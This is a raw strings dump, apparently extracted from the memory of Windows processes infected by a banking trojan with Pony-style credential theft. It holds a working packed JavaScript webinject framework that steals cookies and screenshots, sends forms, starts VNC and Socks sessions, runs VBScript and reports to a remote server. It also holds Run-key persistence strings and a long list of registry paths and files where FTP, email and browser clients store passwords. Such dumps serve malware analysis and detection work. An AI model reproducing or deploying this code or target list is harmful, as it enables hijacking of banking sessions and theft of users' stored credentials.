{687F46D2-25E5-43B6-BD95-68B725074F1D}
{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{6B376189-11A2-4F58-96A6-001E03862004}
\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}
D{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{23DC640D-793E-4D8F-955D-2E6215F37B91}
U{687F46D2-25E5-43B6-BD95-68B725074F1D}
546B5A02-5978-4B96-802A-4C514A243A08
;&;,;3;^;
:$:,:7:?:
9”9C9
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
SearchIndexer.exe_1472_rwx_03090000_00058000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
&.ipO
;&;,;3;^;
:$:,:7:?:
9”9C9
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
conhost.exe_1656_rwx_014A0000_00058000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
